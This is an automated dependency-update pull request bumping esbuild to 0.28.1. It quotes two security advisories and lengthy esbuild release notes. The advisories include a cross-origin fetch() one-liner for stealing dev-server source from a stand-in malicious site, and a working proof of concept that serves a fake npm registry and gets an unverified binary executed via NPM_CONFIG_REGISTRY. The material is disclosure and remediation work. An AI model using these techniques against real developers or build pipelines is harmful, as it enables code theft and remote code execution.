Update dependency esbuild to v0.28.1 [SECURITY] by renovate[bot] · Pull Request #334 · chakra-ui/eslint-plugin-panda

renovate · 2026-06-12T20:36:56Z

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
esbuild	`0.25.0` → `0.28.1`

esbuild enables any website to send any requests to the development server and read the response

GHSA-67mh-4wv8-2f99

More information

Details

Summary

esbuild allows any websites to send any request to the development server and read the response due to default CORS settings.

Details

esbuild sets Access-Control-Allow-Origin: * header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121
https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

Attack scenario:

The attacker serves a malicious web page (http://malicious.example.com).
The user accesses the malicious web page.
The attacker sends a fetch('http://127.0.0.1:8000/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
The attacker gets the content of http://127.0.0.1:8000/main.js.

In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by

Fetching /index.html: normally you have a script tag here
Fetching /assets: it's common to have a assets directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files
Connecting /esbuild SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data)))
Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.

PoC

Download reproduction.zip
Extract it and move to that directory
Run npm i
Run npm run watch
Run fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content)) in a different website's dev tools.

Impact

Users using the serve feature may get the source code stolen by malicious websites.

Severity

CVSS Score: 5.3 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

esbuild: Missing binary integrity verification in Deno module enables remote code execution via NPM_CONFIG_REGISTRY

GHSA-gv7w-rqvm-qjhr

More information

Details

Summary

The esbuild Deno module (lib/deno/mod.ts) downloads native binary executables from an npm registry and writes them to disk with executable permissions (0o755) without performing any integrity verification (e.g., SHA-256 hash check). The Node.js equivalent (lib/npm/node-install.ts) includes a robust binaryIntegrityCheck() function that verifies SHA-256 hashes against hardcoded expected values from package.json, but this protection was never implemented for the Deno distribution.

When the NPM_CONFIG_REGISTRY environment variable is set, the Deno module constructs a download URL using this attacker-influenced value and fetches a native binary from it. Because no integrity check is performed, an attacker who can control this environment variable (common in CI/CD pipelines, shared development environments, or corporate networks with custom npm registries) can supply a malicious binary that will be downloaded, written to disk, and executed with the privileges of the Deno process, achieving full remote code execution.

Details

Vulnerable code path — lib/deno/mod.ts lines 62–82:

async function installFromNPM(name: string, subpath: string): Promise<string> {
  const { finalPath, finalDir } = getCachePath(name)
  try { await Deno.stat(finalPath); return finalPath } catch (e) {}

  const npmRegistry = Deno.env.get("NPM_CONFIG_REGISTRY") || "https://registry.npmjs.org"  // line 70: attacker-controlled
  const url = `${npmRegistry}/${name}/-/${name.replace("@&#8203;esbuild/", "")}-${version}.tgz`     // line 71: URL uses attacker base
  const buffer = await fetch(url).then(r => r.arrayBuffer())                                  // line 72: download
  const executable = extractFileFromTarGzip(new Uint8Array(buffer), subpath)                   // line 73: extract

  await Deno.mkdir(finalDir, { recursive: true, mode: 0o700 })
  await Deno.writeFile(finalPath, executable, { mode: 0o755 })                                 // line 80: write + chmod
  return finalPath                                                                              // line 81: no hash check
}

Missing protection — The Node.js equivalent at lib/npm/node-install.ts lines 228–234:

function binaryIntegrityCheck(pkg: string, subpath: string, bytes: Uint8Array): void {
  const hash = crypto.createHash('sha256').update(bytes).digest('hex')
  const key = `${pkg}/${subpath}`
  const expected = packageJSON['esbuild.binaryHashes'][key]
  if (!expected) throw new Error(`Missing hash for "${key}"`)
  if (hash !== expected) throw new Error(...)
}

This function is called in both the installUsingNPM() path (line 131) and the downloadDirectlyFromNPM() path (line 243), but no equivalent exists in the Deno module. Searching the entire git history confirms binaryIntegrityCheck, binaryHashes, sha256, and hash have never appeared in lib/deno/mod.ts.

Execution flow after download: The binary returned by installFromNPM() is passed to spawn() at line 291 of the same file:

const child = spawn(binPath, { args: [`--service=${version}`], ... })

Attack vector: The NPM_CONFIG_REGISTRY environment variable is a standard npm configuration variable widely used in enterprise CI/CD pipelines to point to internal artifact repositories (Artifactory, Nexus, Verdaccio, etc.). An attacker who can inject or modify this variable in a build environment (e.g., via CI config injection, shared environment, or compromised registry) can redirect the download to a server they control and serve a trojaned native binary.

PoC

Prerequisites: Deno runtime, Node.js (for fake registry)

Step 1: Create a fake npm registry that serves a malicious binary:

// fake-registry.js
const http = require('http');
const zlib = require('zlib');
http.createServer((req, res) => {
  const fakeBin = '#!/bin/sh\necho PWNED > /tmp/deno-esbuild-rce-proof.txt\necho fake-esbuild-0.28.0\n';
  // ... build tar.gz with fake binary as package/bin/esbuild ...
  res.writeHead(200, {'Content-Length': gz.length});
  res.end(gz);
}).listen(19876, () => console.log('READY'));

Step 2: Run the PoC with NPM_CONFIG_REGISTRY pointing to the fake server:

// poc.ts — mimics lib/deno/mod.ts installFromNPM code path
const npmRegistry = Deno.env.get("NPM_CONFIG_REGISTRY") || "https://registry.npmjs.org";
const url = `${npmRegistry}/@&#8203;esbuild/linux-x64/-/linux-x64-0.28.0.tgz`;
const buffer = new Uint8Array(await (await fetch(url)).arrayBuffer());
// ... gzip decompress + tar extraction (same as extractFileFromTarGzip) ...
await Deno.writeFile("/tmp/downloaded-binary", executable, { mode: 0o755 });
// *** NO integrity check performed ***
const cmd = new Deno.Command("/tmp/downloaded-binary");
await cmd.output(); // RCE: executes attacker-controlled binary

Step 3: Run:

node fake-registry.js &
NPM_CONFIG_REGISTRY="http://127.0.0.1:19876" deno run --allow-all poc.ts
cat /tmp/deno-esbuild-rce-proof.txt  # Output: PWNED

Observed output in this environment:

Download URL: http://127.0.0.1:19876/@&#8203;esbuild/linux-x64/-/linux-x64-0.28.0.tgz
Binary written to: /tmp/deno-poc/downloaded-binary
Binary content: #!/bin/sh
echo PWNED > /tmp/deno-esbuild-rce-proof.txt
echo fake-esbuild-0.28.0

Executing downloaded binary...
stdout: fake-esbuild-0.28.0

*** RCE CONFIRMED ***
Marker file content: PWNED

Build-local verification — using the actual built deno/mod.js:

The esbuild Deno module was built from source (node scripts/esbuild.js ./esbuild --deno) producing deno/mod.js. The fake registry test was then re-run using the actual module via import * as esbuild from "file:///path/to/deno/mod.js", triggering the real installFromNPM() → installFromNPM() code path:

[TEST] esbuild Deno module loaded
[TEST] esbuild version: 0.28.0

[TEST] *** RCE VIA ACTUAL MODULE CONFIRMED ***
[TEST] Marker file content: VULN-CONFIRMED
[TEST] The actual built deno/mod.js downloaded and executed
[TEST] a malicious binary from the fake registry WITHOUT
[TEST] performing any SHA-256 integrity verification.

The malicious binary was cached at ~/.cache/esbuild/bin/@esbuild-linux-x64@0.28.0 with contents:


#!/bin/sh
echo "VULN-CONFIRMED" > /tmp/esbuild-deno-verify-rce.txt
echo "0.28.0"

Built-in Deno module (deno/mod.js) confirmed to contain NPM_CONFIG_REGISTRY usage (line 1900) and zero references to binaryIntegrityCheck, binaryHashes, sha256, or crypto.createHash.

Negative/control case — Node.js rejects the same fake binary:

Fake binary SHA-256: d85234b9bac94fcda135d112f0c23d9c31bbb14a5502a37e743a3cf2a3750fa1
Expected hash:       aafacdf135322bf47c882a4ea4db33d0375583f5b9c3fd2d4e12258e470568be
Hashes match: false
=> Node.js path REJECTS the fake binary (hash mismatch)
=> Deno path ACCEPTS it without any check

Impact

An attacker who can control the NPM_CONFIG_REGISTRY environment variable in a Deno project using esbuild can achieve arbitrary code execution with the privileges of the Deno process. This is particularly relevant in:

CI/CD pipelines where NPM_CONFIG_REGISTRY is commonly set to point to internal artifact repositories
Shared development environments where environment variables may be inherited from parent processes
Corporate networks where npm registry mirrors are configured via this environment variable

The attacker does not need to compromise the npm registry itself — only the environment variable or network path between the Deno process and the registry.

Suggested remediation

Add SHA-256 integrity verification to the Deno module, mirroring the existing binaryIntegrityCheck() function from lib/npm/node-install.ts:

// In lib/deno/mod.ts, after extracting the binary:
const hashBuffer = await crypto.subtle.digest("SHA-256", executable);
const hash = Array.from(new Uint8Array(hashBuffer)).map(b => b.toString(16).padStart(2, '0')).join('');
const key = `${name}/${subpath}`;
const expected = EXPECTED_HASHES[key]; // Import from a shared hash manifest
if (hash !== expected) throw new Error(`Binary integrity check failed for "${key}"`);

Validate the NPM_CONFIG_REGISTRY URL to ensure it uses HTTPS (or at minimum warn about HTTP):

const npmRegistry = Deno.env.get("NPM_CONFIG_REGISTRY") || "https://registry.npmjs.org";
if (npmRegistry.startsWith("http://")) {
  console.warn(`[esbuild] Warning: NPM_CONFIG_REGISTRY uses insecure HTTP`);
}

Add ESBUILD_BINARY_PATH validation in the Deno module, mirroring the isValidBinaryPath() check from lib/npm/node-platform.ts.

Regression test suggestion: Add a test that verifies the Deno download path rejects a binary with a mismatched SHA-256 hash.

Severity

CVSS Score: 8.1 / 10 (High)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

evanw/esbuild (esbuild)

`v0.28.1`

Compare Source

Disallow \\ in local development server HTTP requests (GHSA-g7r4-m6w7-qqqr)

This release fixes a security issue where HTTP requests to esbuild's local development server could traverse outside of the serve directory on Windows using a \\ backslash character. It happened due to the use of Go's path.Clean() function, which only handles Unix-style / characters. HTTP requests with paths containing \\ are no longer allowed.

Thanks to @dellalibera for reporting this issue.
Add integrity checks to the Deno API (GHSA-gv7w-rqvm-qjhr)

The previous release of esbuild added integrity checks to esbuild's npm install script. This release also adds integrity checks to esbuild's Deno install script. Now esbuild's Deno API will also fail with an error if the downloaded esbuild binary contains something other than the expected content.

Note that esbuild's Deno API installs from registry.npmjs.org by default, but allows the NPM_CONFIG_REGISTRY environment variable to override this with a custom package registry. This change means that the esbuild executable served by NPM_CONFIG_REGISTRY must now match the expected content.

Thanks to @sondt99 for reporting this issue.
Avoid inlining using and await using declarations (#4482)

Previously esbuild's minifier sometimes incorrectly inlined using and await using declarations into subsequent uses of that declaration, which then fails to dispose of the resource correctly. This bug happened because inlining was done for let and const declarations by avoiding doing it for var declarations, which no longer worked when more declaration types were added. Here's an example:
```
// Original code
{
  using x = new Resource()
  x.activate()
}

// Old output (with --minify)
new Resource().activate();

// New output (with --minify)
{using e=new Resource;e.activate()}
```
Fix module evaluation when an error is thrown (#4461, #4467)

If an error is thrown during module evaluation, esbuild previously didn't preserve the state of the module for subsequent module references. This was observable if import() or require() is used to import a module multiple times. The thrown error is supposed to be thrown by every call to import() or require(), not just the first. With this release, esbuild will now throw the same error every time you call import() or require() on a module that throws during its evaluation.
Fix some edge cases around the new operator (#4477)

Previously esbuild incorrectly printed certain edge cases involving complex expressions inside the target of a new expression (specifically an optional chain and/or a tagged template literal). The generated code for the new target was not correctly wrapped with parentheses, and either contained a syntax error or had different semantics. These edge cases have been fixed so that they now correctly wrap the new target in parentheses. Here is an example of some affected code:
```
// Original code
new (foo()`bar`)()
new (foo()?.bar)()

// Old output
new foo()`bar`();
new (foo())?.bar();

// New output
new (foo())`bar`();
new (foo()?.bar)();
```
Fix renaming of nested var declarations (#4471)

This release fixes a bug where var declarations in nested scopes that are hoisted up to module scope were not correctly being renamed during bundling. That could previously lead to name collisions when minification was disabled, which could potentially cause a behavior change. The bug has been fixed so that these hoisted declarations are now considered to be module-level symbols during the name collision avoidance pass.
Emit var instead of const for certain TypeScript-only constructs for ES5 (#4448)

While esbuild doesn't generally support converting const to var for ES5 due to nested scoping rules (which is currently a build-time error), esbuild previously incorrectly converted TypeScript-only import assignment constructs into a const declaration even when targeting ES5. With this release, esbuild will now use var for this case instead:
```
// Original code
import x = require('y')

// Old output (with --target=es5)
const x = require("y");

// New output (with --target=es5)
var x = require("y");
```

Fix a minification regression with CSS media queries (#4315)

The previous release introduced support for parsing media queries which unintentionally introduced a regression with the removal of duplicate media rules during minification. Specifically the grammar for @media <media-type> and <media-condition-without-or> { ... } was missing an equality check for the <media-condition-without-or> part, so rules with different suffix clauses in this position would incorrectly compare equal and be deduplicated. This release fixes the regression.
Update the list of known JavaScript globals (#4310)

This release updates esbuild's internal list of known JavaScript globals. These are globals that are known to not have side-effects when the property is accessed. For example, accessing the global Array property is considered to be side-effect free but accessing the global scrollY property can trigger a layout, which is a side-effect. This is used by esbuild's tree-shaking to safely remove unused code that is known to be side-effect free. This update adds the following global properties:

From ES2017:
- Atomics
- SharedArrayBuffer
From ES2020:
- BigInt64Array
- BigUint64Array
From ES2021:
- FinalizationRegistry
- WeakRef
From ES2025:
- Float16Array
- Iterator
Note that this does not indicate that constructing any of these objects is side-effect free, just that accessing the identifier is side-effect free. For example, this now allows esbuild to tree-shake classes that extend from Iterator:
```
// This can now be tree-shaken by esbuild:
class ExampleIterator extends Iterator {}
```
Add support for the new @view-transition CSS rule (#4313)

With this release, esbuild now has improved support for pretty-printing and minifying the new @view-transition rule (which esbuild was previously unaware of):
```
/* Original code */
@&#8203;view-transition {
  navigation: auto;
  types: check;
}

/* Old output */
@&#8203;view-transition { navigation: auto; types: check; }

/* New output */
@&#8203;view-transition {
  navigation: auto;
  types: check;
}
```
The new view transition feature provides a mechanism for creating animated transitions between documents in a multi-page app. You can read more about view transition rules here.

This change was contributed by @yisibl.
Trim CSS rules that will never match

The CSS minifier will now remove rules whose selectors contain :is() and :where() as those selectors will never match. These selectors can currently be automatically generated by esbuild when you give esbuild nonsensical input such as the following:
```
/* Original code */
div:before {
  color: green;
  &.foo {
    color: red;
  }
}

/* Old output (with --supported:nesting=false --minify) */
div:before{color:green}:is().foo{color:red}

/* New output (with --supported:nesting=false --minify) */
div:before{color:green}
```
This input is nonsensical because CSS nesting is (unfortunately) not supported inside of pseudo-elements such as :before. Currently esbuild generates a rule containing :is() in this case when you tell esbuild to transform nested CSS into non-nested CSS. I think it's reasonable to do that as it sort of helps explain what's going on (or at least indicates that something is wrong in the output). It shouldn't be present in minified code, however, so this release now strips it out.

`v0.25.11`

Compare Source

Add support for with { type: 'bytes' } imports (#4292)

The import bytes proposal has reached stage 2.7 in the TC39 process, which means that although it isn't quite recommended for implementation, it's generally approved and ready for validation. Furthermore it has already been implemented by Deno and Webpack. So with this release, esbuild will also add support for this. It behaves exactly the same as esbuild's existing binary loader. Here's an example:
```
import data from './image.png' with { type: 'bytes' }
const view = new DataView(data.buffer, 0, 24)
const width = view.getInt32(16)
const height = view.getInt32(20)
console.log('size:', width + '\xD7' + height)
```
Lower CSS media query range syntax (#3748, #4293)

With this release, esbuild will now transform CSS media query range syntax into equivalent syntax using min-/max- prefixes for older browsers. For example, the following CSS:
```
@&#8203;media (640px <= width <= 960px) {
  main {
    display: flex;
  }
}
```
will be transformed like this with a target such as --target=chrome100 (or more specifically with --supported:media-range=false if desired):
```
@&#8203;media (min-width: 640px) and (max-width: 960px) {
  main {
    display: flex;
  }
}
```

`v0.25.10`

Compare Source

Fix a panic in a minification edge case (#4287)

This release fixes a panic due to a null pointer that could happen when esbuild inlines a doubly-nested identity function and the final result is empty. It was fixed by emitting the value undefined in this case, which avoids the panic. This case must be rare since it hasn't come up until now. Here is an example of code that previously triggered the panic (which only happened when minifying):
```
function identity(x) { return x }
identity({ y: identity(123) })
```
Fix @supports nested inside pseudo-element (#4265)

When transforming nested CSS to non-nested CSS, esbuild is supposed to filter out pseudo-elements such as ::placeholder for correctness. The CSS nesting specification says the following:

The nesting selector cannot represent pseudo-elements (identical to the behavior of the ':is()' pseudo-class). We’d like to relax this restriction, but need to do so simultaneously for both ':is()' and '&', since they’re intentionally built on the same underlying mechanisms.

However, it seems like this behavior is different for nested at-rules such as @supports, which do work with pseudo-elements. So this release modifies esbuild's behavior to now take that into account:
```
/* Original code */
::placeholder {
  color: red;
  body & { color: green }
  @&#8203;supports (color: blue) { color: blue }
}

/* Old output (with --supported:nesting=false) */
::placeholder {
  color: red;
}
body :is() {
  color: green;
}
@&#8203;supports (color: blue) {
   {
    color: blue;
  }
}

/* New output (with --supported:nesting=false) */
::placeholder {
  color: red;
}
body :is() {
  color: green;
}
@&#8203;supports (color: blue) {
  ::placeholder {
    color: blue;
  }
}
```

`v0.25.9`

Compare Source

Better support building projects that use Yarn on Windows (#3131, #3663)

With this release, you can now use esbuild to bundle projects that use Yarn Plug'n'Play on Windows on drives other than the C: drive. The problem was as follows:
1. Yarn in Plug'n'Play mode on Windows stores its global module cache on the C: drive
2. Some developers put their projects on the D: drive
3. Yarn generates relative paths that use ../.. to get from the project directory to the cache directory
4. Windows-style paths don't support directory traversal between drives via .. (so D:\.. is just D:)
5. I didn't have access to a Windows machine for testing this edge case
Yarn works around this edge case by pretending Windows-style paths beginning with C:\ are actually Unix-style paths beginning with /C:/, so the ../.. path segments are able to navigate across drives inside Yarn's implementation. This was broken for a long time in esbuild but I finally got access to a Windows machine and was able to debug and fix this edge case. So you should now be able to bundle these projects with esbuild.
Preserve parentheses around function expressions (#4252)

The V8 JavaScript VM uses parentheses around function expressions as an optimization hint to immediately compile the function. Otherwise the function would be lazily-compiled, which has additional overhead if that function is always called immediately as lazy compilation involves parsing the function twice. You can read V8's blog post about this for more details.

Previously esbuild did not represent parentheses around functions in the AST so they were lost during compilation. With this change, esbuild will now preserve parentheses around function expressions when they are present in the original source code. This means these optimization hints will not be lost when bundling with esbuild. In addition, esbuild will now automatically add this optimization hint to immediately-invoked function expressions. Here's an example:
```
// Original code
const fn0 = () => 0
const fn1 = (() => 1)
console.log(fn0, function() { return fn1() }())

// Old output
const fn0 = () => 0;
const fn1 = () => 1;
console.log(fn0, function() {
  return fn1();
}());

// New output
const fn0 = () => 0;
const fn1 = (() => 1);
console.log(fn0, (function() {
  return fn1();
})());
```
Note that you do not want to wrap all function expressions in parentheses. This optimization hint should only be used for functions that are called on initial load. Using this hint for functions that are not called on initial load will unnecessarily delay the initial load. Again, see V8's blog post linked above for details.
Update Go from 1.23.10 to 1.23.12 (#4257, #4258)

This should have no effect on existing code as this version change does not change Go's operating system support. It may remove certain false positive reports (specifically CVE-2025-4674 and CVE-2025-47907) from vulnerability scanners that only detect which version of the Go compiler esbuild uses.

`v0.25.8`

Compare Source

Fix another TypeScript parsing edge case (#4248)

This fixes a regression with a change in the previous release that tries to more accurately parse TypeScript arrow functions inside the ?: operator. The regression specifically involves parsing an arrow function containing a #private identifier inside the middle of a ?: ternary operator inside a class body. This was fixed by propagating private identifier state into the parser clone used to speculatively parse the arrow function body. Here is an example of some affected code:
```
class CachedDict {
  #has = (a: string) => dict.has(a);
  has = window
    ? (word: string): boolean => this.#has(word)
    : this.#has;
}
```
Fix a regression with the parsing of source phase imports

The change in the previous release to parse source phase imports failed to properly handle the following cases:
```
import source from 'bar'
import source from from 'bar'
import source type foo from 'bar'
```
Parsing for these cases should now be fixed. The first case was incorrectly treated as a syntax error because esbuild was expecting the second case. And the last case was previously allowed but is now forbidden. TypeScript hasn't added this feature yet so it remains to be seen whether the last case will be allowed, but it's safer to disallow it for now. At least Babel doesn't allow the last case when parsing TypeScript, and Babel was involved with the source phase import specification.

`v0.25.7`

Compare Source

Parse and print JavaScript imports with an explicit phase (#4238)

This release adds basic syntax support for the defer and source import phases in JavaScript:
- defer
  
  This is a stage 3 proposal for an upcoming JavaScript feature that will provide one way to eagerly load but lazily initialize imported modules. The imported module is automatically initialized on first use. Support for this syntax will also be part of the upcoming release of TypeScript 5.9. The syntax looks like this:
```
import defer * as foo from "<specifier>";
const bar = await import.defer("<specifier>");
```
  Note that this feature deliberately cannot be used with the syntax import defer foo from "<specifier>" or import defer { foo } from "<specifier>".
- source
  
  This is a stage 3 proposal for an upcoming JavaScript feature that will provide another way to eagerly load but lazily initialize imported modules. The imported module is returned in an uninitialized state. Support for this syntax may or may not be a part of TypeScript 5.9 (see this issue for details). The syntax looks like this:
```
import source foo from "<specifier>";
const bar = await import.source("<specifier>");
```
  Note that this feature deliberately cannot be used with the syntax import defer * as foo from "<specifier>" or import defer { foo } from "<specifier>".
This change only adds support for this syntax. These imports cannot currently be bundled by esbuild. To use these new features with esbuild's bundler, the imported paths must be external to the bundle and the output format must be set to esm.
Support optionally emitting absolute paths instead of relative paths (#338, #2082, #3023)

This release introduces the --abs-paths= feature which takes a comma-separated list of situations where esbuild should use absolute paths instead of relative paths. There are currently three supported situations: code (comments and string literals), log (log message text and location info), and metafile (the JSON build metadata).

Using absolute paths instead of relative paths is not the default behavior because it means that the build results are no longer machine-independent (which means builds are no longer reproducible). Absolute paths can be useful when used with certain terminal emulators that allow you to click on absolute paths in the terminal text and/or when esbuild is being automatically invoked from several different directories within the same script.
Fix a TypeScript parsing edge case (#4241)

This release fixes an edge case with parsing an arrow function in TypeScript with a return type that's in the middle of a ?: ternary operator. For example:
```
x = a ? (b) : c => d;
y = a ? (b) : c => d : e;
```
The : token in the value assigned to x pairs with the ? token, so it's not the start of a return type annotation. However, the first : token in the value assigned to y is the start of a return type annotation because after parsing the arrow function body, it turns out there's another : token that can be used to pair with the ? token. This case is notable as it's the first TypeScript edge case that esbuild has needed a backtracking parser to parse. It has been addressed by a quick hack (cloning the whole parser) as it's a rare edge case and esbuild doesn't otherwise need a backtracking parser. Hopefully this is sufficient and doesn't cause any issues.
Inline small constant strings when minifying

Previously esbuild's minifier didn't inline string constants because strings can be arbitrarily long, and this isn't necessarily a size win if the string is used more than once. Starting with this release, esbuild will now inline string constants when the length of the string is three code units or less. For example:
```
// Original code
const foo = 'foo'
console.log({ [foo]: true })

// Old output (with --minify --bundle --format=esm)
var o="foo";console.log({[o]:!0});

// New output (with --minify --bundle --format=esm)
console.log({foo:!0});
```
Note that esbuild's constant inlining only happens in very restrictive scenarios to avoid issues with TDZ handling. This change doesn't change when esbuild's constant inlining happens. It only expands the scope of it to include certain string literals in addition to numeric and boolean literals.

`v0.25.6`

Compare Source

Fix a memory leak when cancel() is used on a build context (#4231)

Calling rebuild() followed by cancel() in rapid succession could previously leak memory. The bundler uses a producer/consumer model internally, and the resource leak was caused by the consumer being termianted while there were still remaining unreceived results from a producer. To avoid the leak, the consumer now waits for all producers to finish before terminating.
Support empty :is() and :where() syntax in CSS (#4232)

Previously using these selectors with esbuild would generate a warning. That warning has been removed in this release for these cases.
Improve tree-shaking of try statements in dead code (#4224)

With this release, esbuild will now remove certain try statements if esbuild considers them to be within dead code (i.e. code that is known to not ever be evaluated). For example:
```
// Original code
return 'foo'
try { return 'bar' } catch {}

// Old output (with --minify)
return"foo";try{return"bar"}catch{}

// New output (with --minify)
return"foo";
```
Consider negated bigints to have no side effects

While esbuild currently considers 1, -1, and 1n to all have no side effects, it didn't previously consider -1n to have no side effects. This is because esbuild does constant folding with numbers but not bigints. However, it meant that unused negative bigint constants were not tree-shaken. With this release, esbuild will now consider these expressions to also be side-effect free:
```
// Original code
let a = 1, b = -1, c = 1n, d = -1n

// Old output (with --bundle --minify)
(()=>{var n=-1n;})();

// New output (with --bundle --minify)
(()=>{})();
```
Support a configurable delay in watch mode before rebuilding (#3476, #4178)

The watch() API now takes a delay option that lets you add a delay (in milliseconds) before rebuilding when a change is detected in watch mode. If you use a tool that regenerates multiple source files very slowly, this should make it more likely that esbuild's watch mode won't generate a broken intermediate build before the successful final build. This option is also available via the CLI using the --watch-delay= flag.

This should also help avoid confusion about the watch() API's options argument. It was previously empty to allow for future API expansion, which caused some people to think that the documentation was missing. It's no longer empty now that the watch() API has an option.
Allow mixed array for entryPoints API option (#4223)

The TypeScript type definitions now allow you to pass a mixed array of both string literals and object literals to the entryPoints API option, such as ['foo.js', { out: 'lib', in: 'bar.js' }]. This was always possible to do in JavaScript but the TypeScript type definitions were previously too restrictive.
Update Go from 1.23.8 to 1.23.10 (#4204, #4207)

This should have no effect on existing code as this version change does not change Go's operating system support. It may remove certain false positive reports (specifically CVE-2025-4673 and CVE-2025-22874) from vulnerability scanners that only detect which version of the Go compiler esbuild uses.
Experimental support for esbuild on OpenHarmony (#4212)

With this release, esbuild now publishes the @esbuild/openharmony-arm64 npm package for OpenHarmony. It contains a WebAssembly binary instead of a native binary because Go doesn't currently support OpenHarmony. Node does support it, however, so in theory esbuild should now work on OpenHarmony through WebAssembly.

This change was contributed by @hqzing.

`v0.25.5`

Compare Source

Fix a regression with browser in package.json (#4187)

The fix to #4144 in version 0.25.3 introduced a regression that caused browser overrides specified in package.json to fail to override relative path names that end in a trailing slash. That behavior change affected the axios@0.30.0 package. This regression has been fixed, and now has test coverage.
Add support for certain keywords as TypeScript tuple labels (#4192)

Previously esbuild could incorrectly fail to parse certain keywords as TypeScript tuple labels that are parsed by the official TypeScript compiler if they were followed by a ? modifier. These labels included function, import, infer, new, readonly, and typeof. With this release, these keywords will now be parsed correctly. Here's an example of some affected code:
```
type Foo = [
  value: any,
  readonly?: boolean, // This is now parsed correctly
]
```
Add CSS prefixes for the stretch sizing value (#4184)

This release adds support for prefixing CSS declarations such as div { width: stretch }. That CSS is now transformed into this depending on what the --target= setting includes:
```
div {
  width: -webkit-fill-available;
  width: -moz-available;
  width: stretch;
}
```

`v0.25.4`

Compare Source

Add simple support for CORS to esbuild's development server (#4125)

Starting with version 0.25.0, esbuild's development server is no longer configured to serve cross-origin requests. This was a deliberate change to prevent any website you visit from accessing your running esbuild development server. However, this change prevented (by design) certain use cases such as "debugging in production" by having your production website load code from localhost where the esbuild development server is running.

To enable this use case, esbuild is adding a feature to allow Cross-Origin Resource Sharing (a.k.a. CORS) for simple requests. Specifically, passing your origin to the new cors option will now set the Access-Control-Allow-Origin response header when the request has a matching Origin header. Note that this currently only works for requests that don't send a preflight OPTIONS request, as esbuild's development server doesn't currently support OPTIONS requests.

Some examples:
- CLI:
```
esbuild --servedir=. --cors-origin=https://example.com
```
- JS:
```
const ctx = await esbuild.context({})
await ctx.serve({
  servedir: '.',
  cors: {
    origin: 'https://example.com',
  },
})
```
- Go:
```
ctx, _ := api.Context(api.BuildOptions{})
ctx.Serve(api.ServeOptions{
  Servedir: ".",
  CORS: api.CORSOptions{
    Origin: []string{"https://example.com"},
  },
})
```
The special origin * can be used to allow any origin to access esbuild's development server. Note that this means any website you visit will be able to read everything served by esbuild.
Pass through invalid URLs in source maps unmodified (#4169)

This fixes a regression in version 0.25.0 where sources in source maps that form invalid URLs were not being passed through to the output. Version 0.25.0 changed the interpretation of sources from file paths to URLs, which means that URL parsing can now fail. Previously URLs that couldn't be parsed were replaced with the empty string. With this release, invalid URLs in sources should now be passed through unmodified.
Handle exports named __proto__ in ES modules (#4162, #4163)

In JavaScript, the special property name __proto__ sets the prototype when used inside an object literal. Previously esbuild's ESM-to-CommonJS conversion didn't special-case the property name of exports named __proto__ so the exported getter accidentally became the prototype of the object literal. It's unclear what this affects, if anything, but it's better practice to avoid this by using a computed property name in this case.

This fix was contributed by @magic-akari.

`v0.25.3`

Compare Source

Fix lowered async arrow functions before super() (#4141, #4142)

This change makes it possible to call an async arrow function in a constructor before calling super() when targeting environments without async support, as long as the function body doesn't reference this. Here's an example (notice the change from this to null):
```
// Original code
class Foo extends Object {
  constructor() {
    (async () => await foo())()
    super()
  }
}

// Old output (with --target=es2016)
class Foo extends Object {
  constructor() {
    (() => __async(this, null, function* () {
      return yield foo();
    }))();
    super();
  }
}

// New output (with --target=es2016)
class Foo extends Object {
  constructor() {
    (() => __async(null, null, function* () {
      return yield foo();
    }))();
    super();
  }
}
```
Some background: Arrow functions with the async keyword are transformed into generator functions for older language targets such as --target=es2016. Since arrow functions capture this, the generated code forwards this into the body of the generator function. However, JavaScript class syntax forbids using this in a constructor before calling super(), and this forwarding was problematic since previously happened even when the function body doesn't use this. Starting with this release, esbuild will now only forward this if it's used within the function body.

This fix was contributed by @magic-akari.
Fix memory leak with --watch=true (#4131, #4132)

This release fixes a memory leak with esbuild when --watch=true is used instead of --watch. Previously using --watch=true caused esbuild to continue to use more and more memory for every rebuild, but --watch=true should now behave like --watch and not leak memory.

This bug happened because esbuild disables the garbage collector when it's not run as a long-lived process for extra speed, but esbuild's checks for which arguments cause esbuild to be a long-lived process weren't updated for the new --watch=true style of boolean command-line flags. This has been an issue since this boolean flag syntax was added in version 0.14.24 in 2022. These checks are unfortunately separate from the regular argument parser because of how esbuild's internals are organized (the command-line interface is exposed as a separate Go API so you can build your own custom esbuild CLI).

This fix was contributed by @mxschmitt.
More concise output for repeated legal comments (#4139)

Some libraries have many files and also use the same legal comment text in all files. Previously esbuild would copy each legal comment to the output file. Starting with this release, legal comments duplicated across separate files will now be grouped in the output file by unique comment content.
Allow a custom host with the development server (#4110)

With this release, you can now use a custom non-IP host with esbuild's local development server (either with --serve= for the CLI or with the serve() call for the API). This was previously possible, but was intentionally broken in version 0.25.0 to fix a security issue. This change adds the functionality back except that it's now opt-in and only for a single domain name that you provide.

For example, if you add a mapping in your /etc/hosts file from local.example.com to 127.0.0.1 and then use esbuild --serve=local.example.com:8000, you will now be able to visit http://local.example.com:8000/ in your browser and successfully connect to esbuild's development server (doing that would previously have been blocked by the browser). This should also work with HTTPS if it's enabled (see esbuild's documentation for how to do that).
Add a limit to CSS nesting expansion (#4114)

